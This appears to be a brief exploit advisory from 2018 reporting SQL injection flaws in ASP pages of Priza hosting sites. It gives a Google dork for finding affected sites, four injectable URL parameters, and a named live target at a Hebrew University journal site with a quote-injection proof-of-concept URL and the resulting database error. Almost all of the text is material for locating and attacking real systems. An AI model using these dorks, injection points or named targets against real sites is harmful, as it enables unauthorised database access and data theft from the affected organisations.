#################################################################################################
# Exploit Title : Priza.Co.iL Hosting Israel SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : priza.co.il
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
Google Dork :
intext:''כל הזכויות שמורות לחברת פריזה מערכות מידע וטכנולוגיות בע"מ © 2002-2016''
# SQL Injection Exploit :
/volumes.asp?id=[SQL Injection]
/authors.asp?id=[SQL Injection]
/articles.asp?article_id=[SQL Injection]
/articles.asp?action=form&article_id=[SQL Injection]
#################################################################################################
The Hebrew University of Jerusalem Partial Answers: Journal of Literature and the History of Ideas is Vulnerable for SQL Inj.
# Example Vulnerable Site => partialanswers.huji.ac.il/volumes.asp?id=1%27 => [ Proof of Concept ] => archive.is/6oHOh
# SQL Database Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1''.
/volumes.asp, line 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################